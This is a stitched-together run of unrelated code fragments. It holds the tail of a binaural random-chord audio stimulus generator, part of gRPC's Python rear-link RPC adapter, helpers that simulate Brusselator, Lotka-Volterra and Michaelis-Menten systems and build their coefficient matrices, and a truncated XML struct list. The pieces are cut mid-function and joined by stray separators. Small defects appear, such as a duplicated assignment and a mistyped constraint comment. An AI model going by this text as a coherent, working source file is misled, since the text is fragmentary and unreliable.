<NAME>., <NAME>., & <NAME>. (1998). Optimizing sound features for cortical neurons. Science, 280(5368), 1439-1444.
<NAME>., <NAME>., <NAME>., <NAME>., & <NAME>. (2003). Spectrotemporal structure of receptive fields in areas AI and AAF of mouse auditory cortex. Journal of neurophysiology, 90(4), 2660-2675.
'''
# Hard code a couple args
pip_ramp_time = 0.005
n_bins_oct = 12 # frequency bins per oct
n_bins_time = int( np.floor( dur / pip_dur ) )
n_oct = np.log2( f2/f1 )
n_bins_freq = int( np.floor( n_oct * n_bins_oct ) )
# Store stim values in matrix format
stim_matrix_0 = np.zeros( ( n_bins_freq, n_bins_time ), dtype=np.float64 )
stim_matrix_0[:,:] = -np.inf
stim_matrix = np.zeros( ( n_bins_freq, n_bins_time, 2 ), dtype=np.float64 )
stim_matrix[:,:,:] = -np.inf
axis_time = np.arange( 0, dur, pip_dur )
axis_freq = f1 * 2 ** ( np.linspace( 0, np.log2( f2/f1 ), n_bins_freq ) )
y = np.zeros( ( int(fs*dur), 2 ), dtype=np.float64 )
n_pips = int( np.floor( n_oct * pip_density ) )
n_pip_samples = int( pip_dur * fs )
# 1/3: populate frequencies for each time bin - - - - - - - - - - - - - - - -
for ii in range(n_bins_time):
freqs = np.random.choice( n_bins_freq, n_pips, replace=False ) # select frequencies to generate for time step
for jj in range(freqs.size):
# Define tone frequency and attenuation
freq = axis_freq[ freqs[jj] ]
if isinstance(pip_atten, int):
atten = pip_atten
elif len( pip_atten ) == 1:
atten = pip_atten[0] # unwrap a single-element list so a scalar attenuation is stored
else:
atten = pip_atten[ np.random.choice( len(pip_atten), 1 )[0] ]
stim_matrix_0[ freqs[jj], ii ] = atten
# 2/3: randomly assign frequencies to each channel in proportion to p_left arg - - - - - - - - - - - - - - - -
idx_tone = np.nonzero( stim_matrix_0 > -np.inf )
n_tones = idx_tone[0].size
idx_l = np.random.choice( n_tones, int( np.ceil( n_tones * p_left ) ), replace=False )
idx_r = np.setdiff1d( np.arange( 0, n_tones ), idx_l )
stim_matrix[ idx_tone[0][idx_l], idx_tone[1][idx_l], 0 ] = stim_matrix_0[ idx_tone[0][idx_l], idx_tone[1][idx_l] ]
stim_matrix[ idx_tone[0][idx_r], idx_tone[1][idx_r], 1 ] = stim_matrix_0[ idx_tone[0][idx_r], idx_tone[1][idx_r] ]
# 3/3: generate chords for each channel specified above - - - - - - - - - - - - - - - -
for ii in range(n_bins_time):
# Left ------
y0 = np.zeros( int(fs*pip_dur ), dtype=np.float64 )
idx_tone0 = np.nonzero( stim_matrix[ :, ii, 0 ] > -np.inf )[0]
if idx_tone0.size > 0:
for jj in range(idx_tone0.size):
# Define tone frequency and attenuation
freq = axis_freq[ idx_tone0[jj] ]
atten = stim_matrix[ idx_tone0[jj], ii, 0 ]
# Generate tone and add to chord
y1 = gen_tone( fs, pip_dur, freq, atten )
y1 = audio_ramp( y1, fs, pip_ramp_time )
y0 += y1
y0 = y0 / idx_tone0.size
y[ n_pip_samples * ii: n_pip_samples * (ii+1), 0 ] = y0
# Right ------
y0 = np.zeros( int(fs*pip_dur ), dtype=np.float64 )
idx_tone0 = np.nonzero( stim_matrix[ :, ii, 1 ] > -np.inf )[0]
if idx_tone0.size > 0:
for jj in range(idx_tone0.size):
# Define tone frequency and attenuation
freq = axis_freq[ idx_tone0[jj] ]
atten = stim_matrix[ idx_tone0[jj], ii, 1 ]
# Generate tone and add to chord
y1 = gen_tone( fs, pip_dur, freq, atten )
y1 = audio_ramp( y1, fs, pip_ramp_time )
y0 += y1
y0 = y0 / idx_tone0.size
y[ n_pip_samples * ii: n_pip_samples * (ii+1), 1 ] = y0
if opt_plot:
fig, ax = plt.subplots(1,2)
fig.set_size_inches( 15, 5 )
im = ax[0].imshow( stim_matrix[:,:,0], cmap='RdBu', origin='lower', aspect='auto', extent=[ min(axis_time),max(axis_time), min(axis_freq),max(axis_freq) ] )
ax[0].set_xlabel('Time (s)')
ax[0].set_ylabel('Frequency (Hz)')
ax[0].set_title('Left')
im = ax[1].imshow( stim_matrix[:,:,1], cmap='RdBu', origin='lower', aspect='auto', extent=[ min(axis_time),max(axis_time), min(axis_freq),max(axis_freq) ] )
ax[1].set_xlabel('Time (s)')
ax[1].set_ylabel('Frequency (Hz)')
ax[1].set_title('Right')
fig.colorbar(im, ax=ax)
return y, stim_matrix, axis_time, axis_freq
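# Hedged usage sketch (parameter values taken from Example 1 in the docstring above; kept as a
# comment so importing this module stays side-effect free):
#   y, stim_matrix, axis_time, axis_freq = gen_dynamic_random_chord_binaural(
#       48e3, 3, 200., 3200, 0.05, [0, 10, 20, 30], 6, 0.8, opt_plot=False)
#   # y has shape (int(48e3*3), 2): column 0 is the left channel, column 1 the right channel.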
def gen_fm_sweep( fs, dur, f1, f2, sweep_direction=1 ):
'''
Generate frequency-modulated sweep (audio waveform)
INPUT -------
fs : audio sample rate, e.g., 48e3
dur : duration (s)
f1 : low frequency (Hz)
f2 : high frequency (Hz), should not exceed fs/2
sweep_direction: ascending (1) or descending (0)
RETURN -------
y : audio signal (sound pressure waveform)
Example:
fs = 48e3
dur = 0.5
f1 = 200.
f2 = 2e4
sweep_direction = 1
'''
tvec = np.arange( 0, dur, 1/fs ) # time vector
# log sweep
beta = ( np.log( f2/f1 ) ) / dur
# set zero crossing of sweep at t=0 | |
<filename>src/python/grpcio/grpc/_adapter/rear.py
# Copyright 2015, Google Inc.
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are
# met:
#
# * Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above
# copyright notice, this list of conditions and the following disclaimer
# in the documentation and/or other materials provided with the
# distribution.
# * Neither the name of Google Inc. nor the names of its
# contributors may be used to endorse or promote products derived from
# this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
# A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT
# OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
# SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT
# LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
# DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
# THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
"""The RPC-invocation-side bridge between RPC Framework and GRPC-on-the-wire."""
import enum
import logging
import threading
import time
from grpc._adapter import _common
from grpc._adapter import _intermediary_low as _low
from grpc.framework.base import interfaces as base_interfaces
from grpc.framework.base import null
from grpc.framework.foundation import activated
from grpc.framework.foundation import logging_pool
_THREAD_POOL_SIZE = 10
_INVOCATION_EVENT_KINDS = (
_low.Event.Kind.METADATA_ACCEPTED,
_low.Event.Kind.FINISH
)
@enum.unique
class _LowWrite(enum.Enum):
"""The possible categories of low-level write state."""
OPEN = 'OPEN'
ACTIVE = 'ACTIVE'
CLOSED = 'CLOSED'
class _RPCState(object):
"""The full state of any tracked RPC.
Attributes:
call: The _low.Call object for the RPC.
outstanding: The set of Event.Kind values describing expected future events
for the RPC.
active: A boolean indicating whether or not the RPC is active.
common: An _common.RPCState describing additional state for the RPC.
"""
def __init__(self, call, outstanding, active, common):
self.call = call
self.outstanding = outstanding
self.active = active
self.common = common
def _write(operation_id, call, outstanding, write_state, serialized_payload):
if write_state.low is _LowWrite.OPEN:
call.write(serialized_payload, operation_id, 0)
outstanding.add(_low.Event.Kind.WRITE_ACCEPTED)
write_state.low = _LowWrite.ACTIVE
elif write_state.low is _LowWrite.ACTIVE:
write_state.pending.append(serialized_payload)
else:
raise ValueError('Write attempted after writes completed!')
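# Note on the low-level write state machine used above: a write issued while the state is OPEN goes
# straight to the wire and moves the state to ACTIVE; writes issued while ACTIVE are queued in
# write_state.pending and are drained one at a time by _on_write_event as WRITE_ACCEPTED events
# arrive; once the state is CLOSED any further write is a caller error.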
class RearLink(base_interfaces.RearLink, activated.Activated):
"""An invocation-side bridge between RPC Framework and the C-ish _low code."""
def __init__(
self, host, port, pool, request_serializers, response_deserializers,
secure, root_certificates, private_key, certificate_chain,
metadata_transformer=None, server_host_override=None):
"""Constructor.
Args:
host: The host to which to connect for RPC service.
port: The port to which to connect for RPC service.
pool: A thread pool.
request_serializers: A dict from RPC method names to request object
serializer behaviors.
response_deserializers: A dict from RPC method names to response object
deserializer behaviors.
secure: A boolean indicating whether or not to use a secure connection.
root_certificates: The PEM-encoded root certificates or None to ask for
them to be retrieved from a default location.
private_key: The PEM-encoded private key to use or None if no private
key should be used.
certificate_chain: The PEM-encoded certificate chain to use or None if
no certificate chain should be used.
metadata_transformer: A function that given a metadata object produces
another metadata to be used in the underlying communication on the
wire.
server_host_override: (For testing only) the target name used for SSL
host name checking.
"""
self._condition = threading.Condition()
self._host = host
self._port = port
self._pool = pool
self._request_serializers = request_serializers
self._response_deserializers = response_deserializers
self._fore_link = null.NULL_FORE_LINK
self._completion_queue = None
self._channel = None
self._rpc_states = {}
self._spinning = False
if secure:
self._client_credentials = _low.ClientCredentials(
root_certificates, private_key, certificate_chain)
else:
self._client_credentials = None
self._root_certificates = root_certificates
self._private_key = private_key
self._certificate_chain = certificate_chain
self._metadata_transformer = metadata_transformer
self._server_host_override = server_host_override
def _on_write_event(self, operation_id, event, rpc_state):
if event.write_accepted:
if rpc_state.common.write.pending:
rpc_state.call.write(
rpc_state.common.write.pending.pop(0), operation_id, 0)
rpc_state.outstanding.add(_low.Event.Kind.WRITE_ACCEPTED)
elif rpc_state.common.write.high is _common.HighWrite.CLOSED:
rpc_state.call.complete(operation_id)
rpc_state.outstanding.add(_low.Event.Kind.COMPLETE_ACCEPTED)
rpc_state.common.write.low = _LowWrite.CLOSED
else:
rpc_state.common.write.low = _LowWrite.OPEN
else:
logging.error('RPC write not accepted! Event: %s', (event,))
rpc_state.active = False
ticket = base_interfaces.BackToFrontTicket(
operation_id, rpc_state.common.sequence_number,
base_interfaces.BackToFrontTicket.Kind.TRANSMISSION_FAILURE, None)
rpc_state.common.sequence_number += 1
self._fore_link.accept_back_to_front_ticket(ticket)
def _on_read_event(self, operation_id, event, rpc_state):
if event.bytes is not None:
rpc_state.call.read(operation_id)
rpc_state.outstanding.add(_low.Event.Kind.READ_ACCEPTED)
ticket = base_interfaces.BackToFrontTicket(
operation_id, rpc_state.common.sequence_number,
base_interfaces.BackToFrontTicket.Kind.CONTINUATION,
rpc_state.common.deserializer(event.bytes))
rpc_state.common.sequence_number += 1
self._fore_link.accept_back_to_front_ticket(ticket)
def _on_complete_event(self, operation_id, event, rpc_state):
if not event.complete_accepted:
logging.error('RPC complete not accepted! Event: %s', (event,))
rpc_state.active = False
ticket = base_interfaces.BackToFrontTicket(
operation_id, rpc_state.common.sequence_number,
base_interfaces.BackToFrontTicket.Kind.TRANSMISSION_FAILURE, None)
rpc_state.common.sequence_number += 1
self._fore_link.accept_back_to_front_ticket(ticket)
# TODO(nathaniel): Metadata support.
def _on_metadata_event(self, operation_id, event, rpc_state): # pylint: disable=unused-argument
rpc_state.call.read(operation_id)
rpc_state.outstanding.add(_low.Event.Kind.READ_ACCEPTED)
def _on_finish_event(self, operation_id, event, rpc_state):
"""Handle termination of an RPC."""
# TODO(nathaniel): Cover all statuses.
if event.status.code is _low.Code.OK:
kind = base_interfaces.BackToFrontTicket.Kind.COMPLETION
elif event.status.code is _low.Code.CANCELLED:
kind = base_interfaces.BackToFrontTicket.Kind.CANCELLATION
elif event.status.code is _low.Code.DEADLINE_EXCEEDED:
kind = base_interfaces.BackToFrontTicket.Kind.EXPIRATION
else:
kind = base_interfaces.BackToFrontTicket.Kind.TRANSMISSION_FAILURE
ticket = base_interfaces.BackToFrontTicket(
operation_id, rpc_state.common.sequence_number, kind, None)
rpc_state.common.sequence_number += 1
self._fore_link.accept_back_to_front_ticket(ticket)
def _spin(self, completion_queue):
while True:
event = completion_queue.get(None)
operation_id = event.tag
with self._condition:
rpc_state = self._rpc_states[operation_id]
rpc_state.outstanding.remove(event.kind)
if rpc_state.active and self._completion_queue is not None:
if event.kind is _low.Event.Kind.WRITE_ACCEPTED:
self._on_write_event(operation_id, event, rpc_state)
elif event.kind is _low.Event.Kind.METADATA_ACCEPTED:
self._on_metadata_event(operation_id, event, rpc_state)
elif event.kind is _low.Event.Kind.READ_ACCEPTED:
self._on_read_event(operation_id, event, rpc_state)
elif event.kind is _low.Event.Kind.COMPLETE_ACCEPTED:
self._on_complete_event(operation_id, event, rpc_state)
elif event.kind is _low.Event.Kind.FINISH:
self._on_finish_event(operation_id, event, rpc_state)
else:
logging.error('Illegal RPC event! %s', (event,))
if not rpc_state.outstanding:
self._rpc_states.pop(operation_id)
if not self._rpc_states:
self._spinning = False
self._condition.notify_all()
return
def _invoke(self, operation_id, name, high_state, payload, timeout):
"""Invoke an RPC.
Args:
operation_id: Any object to be used as an operation ID for the RPC.
name: The RPC method name.
high_state: A _common.HighWrite value representing the "high write state"
of the RPC.
payload: A payload object for the RPC or None if no payload was given at
invocation-time.
timeout: A duration of time in seconds to allow for the RPC.
"""
request_serializer = self._request_serializers[name]
call = _low.Call(self._channel, self._completion_queue, name, self._host, time.time() + timeout)
if self._metadata_transformer is not None:
metadata = self._metadata_transformer([])
for metadata_key, metadata_value in metadata:
call.add_metadata(metadata_key, metadata_value)
call.invoke(self._completion_queue, operation_id, operation_id)
outstanding = set(_INVOCATION_EVENT_KINDS)
if payload is None:
if high_state is _common.HighWrite.CLOSED:
call.complete(operation_id)
low_state = _LowWrite.CLOSED
outstanding.add(_low.Event.Kind.COMPLETE_ACCEPTED)
else:
low_state = _LowWrite.OPEN
else:
serialized_payload = request_serializer(payload)
call.write(serialized_payload, operation_id, 0)
outstanding.add(_low.Event.Kind.WRITE_ACCEPTED)
low_state = _LowWrite.ACTIVE
write_state = _common.WriteState(low_state, high_state, [])
common_state = _common.CommonRPCState(
write_state, 0, self._response_deserializers[name], request_serializer)
self._rpc_states[operation_id] = _RPCState(
call, outstanding, True, common_state)
if not self._spinning:
self._pool.submit(self._spin, self._completion_queue)
self._spinning = True
def _commence(self, operation_id, name, payload, timeout):
self._invoke(operation_id, name, _common.HighWrite.OPEN, payload, timeout)
def _continue(self, operation_id, payload):
rpc_state = self._rpc_states.get(operation_id, None)
if rpc_state is None or not rpc_state.active:
return
_write(
operation_id, rpc_state.call, rpc_state.outstanding,
rpc_state.common.write, rpc_state.common.serializer(payload))
def _complete(self, operation_id, payload):
"""Close writes associated with an ongoing RPC.
Args:
operation_id: Any object being used as an operation ID for the RPC.
payload: A payload object for the RPC (and thus the last payload object
for the RPC) or None if no payload was given along with the instruction
to indicate the end of writes for the RPC.
"""
rpc_state = self._rpc_states.get(operation_id, None)
if rpc_state is None or not rpc_state.active:
return
write_state = rpc_state.common.write
if payload is None:
if write_state.low is _LowWrite.OPEN:
rpc_state.call.complete(operation_id)
rpc_state.outstanding.add(_low.Event.Kind.COMPLETE_ACCEPTED)
write_state.low = _LowWrite.CLOSED
else:
_write(
operation_id, rpc_state.call, rpc_state.outstanding, write_state,
rpc_state.common.serializer(payload))
write_state.high = _common.HighWrite.CLOSED
def _entire(self, operation_id, name, payload, timeout):
self._invoke(operation_id, name, _common.HighWrite.CLOSED, payload, timeout)
def _cancel(self, operation_id):
rpc_state = self._rpc_states.get(operation_id, None)
if rpc_state is not None and rpc_state.active:
rpc_state.call.cancel()
rpc_state.active = False
def join_fore_link(self, fore_link):
"""See base_interfaces.RearLink.join_fore_link for specification."""
with self._condition:
self._fore_link = null.NULL_FORE_LINK if fore_link is None else fore_link
def _start(self):
"""Starts this RearLink.
This method must be called before attempting to exchange tickets with this
object.
"""
with self._condition:
self._completion_queue = _low.CompletionQueue()
self._channel = _low.Channel(
'%s:%d' % (self._host, self._port), self._client_credentials,
server_host_override=self._server_host_override)
return self
def _stop(self):
"""Stops this RearLink.
This method must be called for proper termination of this object, and no
attempts to exchange tickets with this object may be made after this method
has been called.
"""
with self._condition:
self._completion_queue.stop()
self._completion_queue = None
while self._spinning:
self._condition.wait()
def __enter__(self):
"""See activated.Activated.__enter__ for specification."""
return self._start()
def __exit__(self, exc_type, exc_val, | |
+ "^3")] = (
1 * beta
)
exact_solution[
i, reference_polynomial.index("x" + str(i) + "^2 x" + str(i + 1))
] = (3 * beta)
exact_solution[
i, reference_polynomial.index("x" + str(i) + " x" + str(i + 1) + "^2")
] = (-3 * beta)
exact_solution[
i, reference_polynomial.index("x" + str(i - 1) + " x" + str(i) + "^2")
] = (3 * beta)
exact_solution[
i, reference_polynomial.index("x" + str(i - 1) + "^2 x" + str(i))
] = (-3 * beta)
# Equation for the end point.
exact_solution[
number_of_oscillators - 1,
reference_polynomial.index("x" + str(number_of_oscillators - 1)),
] = -2
exact_solution[
number_of_oscillators - 1,
reference_polynomial.index("x" + str(number_of_oscillators - 2)),
] = 1
# Third order terms
exact_solution[
number_of_oscillators - 1,
reference_polynomial.index("x" + str(number_of_oscillators - 1) + "^3"),
] = (-2 * beta)
exact_solution[
number_of_oscillators - 1,
reference_polynomial.index("x" + str(number_of_oscillators - 2) + "^3"),
] = beta
exact_solution[
number_of_oscillators - 1,
reference_polynomial.index(
"x"
+ str(number_of_oscillators - 2)
+ "^2 x"
+ str(number_of_oscillators - 1)
),
] = (-3 * beta)
exact_solution[
number_of_oscillators - 1,
reference_polynomial.index(
"x"
+ str(number_of_oscillators - 2)
+ " x"
+ str(number_of_oscillators - 1)
+ "^2"
),
] = (3 * beta)
return exact_solution
def brusselator_time(initial_position, t_min = 0.0, t_max = 10.0, num_steps = 1000, r_coefficients = [1, 3, 1, 1]):
# rate constants:
# r1 = 1  # 0 -> A
# r2 = 3  # A -> B
# r3 = 1  # 2A + B -> 3A
# r4 = 1  # A -> 0
r1, r2, r3, r4 = r_coefficients
def fun_exact(t, y):
return np.array([r1-r2*y[0]+r3*y[0]**2*y[1]-r4*y[0], r2*y[0]-r3*y[0]**2*y[1]])
from scipy.integrate import solve_ivp
sol_true = solve_ivp(
fun_exact,
[0, t_max],
initial_position,
t_eval=np.linspace(t_min, t_max, num_steps),
vectorized=False,
)
assert (
sol_true["status"] == 0
), "The integration of the initial value solver was not succesfull."
return sol_true, fun_exact(sol_true['t'], sol_true['y'])
# Build the exact dynamics of the Brusselator for a polynomial basis of order up to three.
def exact_solution_brusselator(dimension, polinomial, r_coefficients):
r1, r2, r3, r4 = r_coefficients
reference_polynomial = polinomial.get_feature_names()
num_basis_functions = len(reference_polynomial)
# Build the exact coefficient matrix
exact_solution = np.zeros((dimension, num_basis_functions))
# Solution for the first species
exact_solution[0, reference_polynomial.index("1")] = r1
exact_solution[0, reference_polynomial.index("x0")] = - r2 - r4
exact_solution[0, reference_polynomial.index("x0")] = - r2 - r4
exact_solution[0, reference_polynomial.index("x0^2 x1")] = r3
# Solution for the second species
exact_solution[1, reference_polynomial.index("x0")] = r2
exact_solution[1, reference_polynomial.index("x0^2 x1")] = -r3
return exact_solution
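# Hedged usage sketch (assumes the `polinomial` argument behaves like scikit-learn's
# PolynomialFeatures, whose get_feature_names() yields labels such as "1", "x0", "x0^2 x1";
# the basis object actually used by this project may differ):
#   from sklearn.preprocessing import PolynomialFeatures
#   basis = PolynomialFeatures(degree=3)
#   basis.fit(np.zeros((1, 2)))                      # 2 species for the Brusselator
#   Xi = exact_solution_brusselator(2, basis, [1, 3, 1, 1])
#   # Row 0 of Xi holds the coefficients of d/dt A in the monomial basis.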
def lutka_volterra_time(initial_position, t_min = 0.0, t_max = 10.0, num_steps = 1000, r_coefficients = [1, 1, 1, 1]):
# rate constants:
# r1 = 1  # reproduction of prey: A -> 2A
# r2 = 1  # death of predator: B -> 0
# r3 = 1  # consumption: A + B -> B
# r4 = 1  # reproduction of predator: A + B -> A + 2B
r1, r2, r3, r4 = r_coefficients
def fun_exact(t, y):
return np.array([y[0]*(r1-r3*y[1]), -y[1]*(r2-r4*y[0])])
from scipy.integrate import solve_ivp
sol_true = solve_ivp(
fun_exact,
[0, t_max],
initial_position,
t_eval=np.linspace(t_min, t_max, num_steps),
vectorized=False,
)
assert (
sol_true["status"] == 0
), "The integration of the initial value solver was not succesfull."
return sol_true, fun_exact(sol_true['t'], sol_true['y'])
# Build the exact dynamics of the Lotka-Volterra system for a polynomial basis of order up to three.
def exact_solution_lutka_volterra(dimension, polinomial, r_coefficients):
r1, r2, r3, r4 = r_coefficients
reference_polynomial = polinomial.get_feature_names()
num_basis_functions = len(reference_polynomial)
# Build the exact coefficient matrix
exact_solution = np.zeros((dimension, num_basis_functions))
# Solution for the first species
exact_solution[0, reference_polynomial.index("x0")] = r1
exact_solution[0, reference_polynomial.index("x0 x1")] = - r3
# Solution for the second species
exact_solution[1, reference_polynomial.index("x1")] = - r2
exact_solution[1, reference_polynomial.index("x0 x1")] = r4
return exact_solution
def michaelis_menten_time(dimension, number_of_snapshots, number_of_experiments = 10, t_min = 0.0, t_max = 10.0, coefficients = [0.01, 1, 1]):
#Expressions
#d/dt C_1 = - k_{1}*C_{1}*C_{2} + k_{-1}* C_{3}
#d/dt C_2 = - k_{1}*C_{1}*C_{2} + (k_{-1} + k_{2})* C_{3}
#d/dt C_3 = k_{1}*C_{1}*C_{2} - (k_{-1} + k_{2})* C_{3}
#d/dt C_4 = k_{2}*C_{3}
# initial_position = np.array([1.0, 0.7, 0.0, 0.0])
k_1, k_2, k_minus1 = coefficients
def fun_exact(t, y):
return np.array([-k_1*y[0]*y[1] + k_minus1*y[2], -k_1*y[0]*y[1] + (k_minus1 + k_2)*y[2], k_1*y[0]*y[1] - (k_minus1 + k_2)*y[2], k_2*y[2]])
from scipy.integrate import solve_ivp
list_snapshots = []
list_derivatives = []
list_times = []
for i in range(number_of_experiments):
initial_position = np.random.rand(4)
sol = solve_ivp(
fun_exact,
[0, t_max],
initial_position,
t_eval=np.linspace(t_min, t_max, number_of_snapshots),
vectorized=False,
)
assert (
sol["status"] == 0
), "The integration of the initial value solver was not succesfull."
snapshots = sol.y
derivatives = np.zeros([dimension, number_of_snapshots])
for j in range(number_of_snapshots): # separate index so the outer experiment counter is not shadowed
derivatives[:, j] = fun_exact(0, snapshots[:, j])
list_derivatives.append(derivatives)
list_times.append(sol['t'])
list_snapshots.append(snapshots)
return list_snapshots, list_derivatives, list_times
def michaelis_menten_time_individual(initial_position, t_min = 0.0, t_max = 10.0, num_steps = 1000, coefficients = [0.01, 1, 1]):
#Expressions
#d/dt C_1 = - k_{1}*C_{1}*C_{2} + k_{-1}* C_{3}
#d/dt C_2 = - k_{1}*C_{1}*C_{2} + (k_{-1} + k_{2})* C_{3}
#d/dt C_3 = k_{1}*C_{1}*C_{2} - (k_{-1} + k_{2})* C_{3}
#d/dt C_4 = k_{2}*C_{3}
k_1, k_2, k_minus1 = coefficients
def fun_exact(t, y):
return np.array([-k_1*y[0]*y[1] + k_minus1*y[2], -k_1*y[0]*y[1] + (k_minus1 + k_2)*y[2], k_1*y[0]*y[1] - (k_minus1 + k_2)*y[2], k_2*y[2]])
from scipy.integrate import solve_ivp
sol_true = solve_ivp(
fun_exact,
[0, t_max],
initial_position,
t_eval=np.linspace(t_min, t_max, num_steps),
vectorized=False,
)
assert (
sol_true["status"] == 0
), "The integration of the initial value solver was not succesfull."
return sol_true, fun_exact(sol_true['t'], sol_true['y'])
# Build the exact dynamics of the Michaelis-Menten system for a polynomial basis of order up to three.
def exact_solution_michaelis_menten(dimension, polinomial, coefficients):
assert dimension == 4, "The dimension of the michaelis-menten dynamic should be 4."
k_1, k_2, k_minus1 = coefficients
reference_polynomial = polinomial.get_feature_names()
num_basis_functions = len(reference_polynomial)
exact_solution = np.zeros((dimension, num_basis_functions))
#First species.
exact_solution[0, reference_polynomial.index("x0 x1")] = -k_1
exact_solution[0, reference_polynomial.index("x2")] = k_minus1
#Second species
exact_solution[1, reference_polynomial.index("x0 x1")] = -k_1
exact_solution[1, reference_polynomial.index("x2")] = k_minus1 + k_2
#Third species
exact_solution[2, reference_polynomial.index("x0 x1")] = k_1
exact_solution[2, reference_polynomial.index("x2")] = -(k_minus1 + k_2)
#Fourth species.
exact_solution[3, reference_polynomial.index("x2")] = k_2
return exact_solution
# Build the exact dynamics of the Michaelis-Menten system for a polynomial basis of order up to three.
def exact_solution_michaelis_menten_1D(polinomial, coefficients, initial_position):
k_1, k_2, k_minus1 = coefficients
reference_polynomial = polinomial.get_feature_names()
num_basis_functions = len(reference_polynomial)
dimension = 4 # four chemical species, matching exact_solution_michaelis_menten
exact_solution = np.zeros((dimension, num_basis_functions))
#First species.
exact_solution[0, reference_polynomial.index("x0 x1")] = -k_1
exact_solution[0, reference_polynomial.index("x2")] = k_minus1
#Second species
exact_solution[1, reference_polynomial.index("x0 x1")] = -k_1
exact_solution[1, reference_polynomial.index("x2")] = k_minus1 + k_2
#Third species
exact_solution[2, reference_polynomial.index("x0 x1")] = k_1
exact_solution[2, reference_polynomial.index("x2")] = -(k_minus1 + k_2)
#Fourth species.
exact_solution[3, reference_polynomial.index("x2")] = k_2
return exact_solution
#Add the constraints given by:
#d/dt (C_{2} + C_{3}) = 0
#d/dt (C_{1} + C_{3} + C_{4}) + 0
def add_constraints_michaelis_menten_easy(polinomial):
feature_names = polinomial.get_feature_names()
list_constraints = []
for i in range(len(feature_names)):
list_constraints.append({"x" + str(int(len(feature_names) + i)): 1.0, "x" + str(int(2.0*len(feature_names) + i)): 1.0, "constant": 0.0})
list_constraints.append({"x" + str(i): 1.0, "x" + str(int(2.0*len(feature_names) + i)): 1.0,"x" + str(int(3.0*len(feature_names) + i)): 1.0 , "constant": 0.0})
return list_constraints
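# Hedged reading of the constraints built above (variable naming is the one already used in the
# dictionaries, i.e. the flattened coefficient matrix with N = len(feature_names) unknowns per
# species): for every basis function i the first dictionary enforces xi_2[i] + xi_3[i] == 0,
# i.e. d/dt(C_2 + C_3) = 0, and the second enforces xi_1[i] + xi_3[i] + xi_4[i] == 0,
# i.e. d/dt(C_1 + C_3 + C_4) = 0.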
def add_constraints_michaelis_menten_hard(polinomial, data, normalization_factors, epsilon):
feature_names = polinomial.get_feature_names()
num_data_points = data.shape[1]
list_constraints = []
#Four constraints per datapoint
for j in range(num_data_points):
constraint_dictionary = {}
constraint_dictionary2 = {}
constraint_dictionary3 = {}
constraint_dictionary4 = {}
for i in range(len(feature_names)):
#First symmetry. One side of abs val.
constraint_dictionary["x" + str(int(len(feature_names) + i))] = data[i, j]/normalization_factors[i][0]
constraint_dictionary["x" + str(int(2.0*len(feature_names) + i))] = data[i, j]/normalization_factors[i][0]
constraint_dictionary["constant"] = epsilon
#First symmetry. Other side of abs val.
constraint_dictionary2["x" + str(int(len(feature_names) + i))] = -data[i, j]/normalization_factors[i][0]
constraint_dictionary2["x" + str(int(2.0*len(feature_names) + i))] = -data[i, j]/normalization_factors[i][0]
constraint_dictionary2["constant"] = epsilon
#Second symmetry. One side of abs val.
constraint_dictionary3["x" + str(i)] = data[i, j]/normalization_factors[i][0]
constraint_dictionary3["x" + str(int(2.0*len(feature_names) + i))] = data[i, j]/normalization_factors[i][0]
constraint_dictionary3["x" + str(int(3.0*len(feature_names) + i))] = data[i, j]/normalization_factors[i][0]
constraint_dictionary3["constant"] = epsilon
#Second symmetry. Other side of abs val.
constraint_dictionary4["x" + str(i)] = -data[i, j]/normalization_factors[i][0]
constraint_dictionary4["x" + str(int(2.0*len(feature_names) + i))] = -data[i, j]/normalization_factors[i][0]
constraint_dictionary4["x" + str(int(3.0*len(feature_names) + i))] = -data[i, j]/normalization_factors[i][0]
constraint_dictionary4["constant"] = epsilon
list_constraints.append(constraint_dictionary)
list_constraints.append(constraint_dictionary2)
list_constraints.append(constraint_dictionary3)
list_constraints.append(constraint_dictionary4)
return list_constraints
def simulate_dynamics(basis, dynamic, initial_position, t_max, num_steps = 1000):
# Plot the exact trajectory.
def fun_dynamic(t, y):
return np.dot(
dynamic, basis.fit_transform(y.reshape(1, -1)).T
).squeeze()
from scipy.integrate import solve_ivp
t_val = np.linspace(0, t_max, num_steps)
sol_true = solve_ivp(fun_dynamic,[0, t_max], initial_position, t_eval= np.linspace(0.0, t_max, num_steps), vectorized=False)
return sol_true['y'], t_val
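# Hedged usage sketch combining the helpers above (assumes a scikit-learn style PolynomialFeatures
# basis as in the exact_solution_* functions; illustrative only):
#   from sklearn.preprocessing import PolynomialFeatures
#   basis = PolynomialFeatures(degree=3)
#   basis.fit(np.zeros((1, 2)))
#   Xi = exact_solution_lutka_volterra(2, basis, [1, 1, 1, 1])
#   trajectory, t_val = simulate_dynamics(basis, Xi, np.array([1.5, 1.0]), t_max=10.0)
#   # trajectory[0] is the prey population, trajectory[1] the predator population.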
def simulate_dynamics_kuramoto(basis, dynamic, initial_position, t_max, num_steps = 1000):
# Plot the exact trajectory.
def fun_dynamic(t, y):
y_transformed = np.vstack(
(np.cos(y), np.sin(y))
)
return np.dot(
dynamic, basis.fit_transform(y_transformed.reshape(1, -1)).T
).squeeze()
from scipy.integrate import solve_ivp
t_val = np.linspace(0, t_max, num_steps)
| |
<Bit>0</Bit>
</StructEntry>
<StructEntry Name="Bit1" NameSpace="Custom">
<Bit>1</Bit>
</StructEntry>
<StructEntry Name="Bit2" NameSpace="Custom">
